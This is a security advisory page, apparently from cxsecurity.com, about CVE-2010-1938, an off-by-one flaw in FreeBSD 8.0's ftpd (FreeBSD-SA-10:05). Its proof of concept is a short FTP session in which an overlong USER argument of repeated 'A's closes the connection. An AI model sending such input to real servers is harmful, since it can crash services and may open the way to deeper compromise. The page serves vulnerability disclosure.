FreeBSD 8.0 ftpd off-by one PoC (FreeBSD-SA-10:05)

Published
Credit
Risk
2010.05.27
Maksymilian Arciemowicz
High
CWE
CVE
Local
Remote
CWE-189
CVE-2010-1938
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
9.3/10
10/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
Complete
Complete
Complete

# FreeBSD 8.0 ftpd off-by one PoC (FreeBSD-SA-10:05)
# CVE-2010-1938
# FreeBSD-SA-10:05
# Credit: Maksymilian Arciemowicz and Adam Zabrocki
#
# http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc
# http://blog.pi3.com.pl/?p=111
#

PoC:
Connected to localhost.
Escape character is '^]'.
220 127.cx FTP server (Version 6.00LS) ready.
user cx
331 Password required for cx.
user AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Connection closed by foreign host.

- --
Best Regards,
- ------------------------
pub 1024D/A6986BD6 2008-08-22
uid Maksymilian Arciemowicz (cxib)
<cxib@securityreason.com>
sub 4096g/0889FA9A 2008-08-22

References:

http://cxsecurity.com/issue/WLB-2010050285
http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com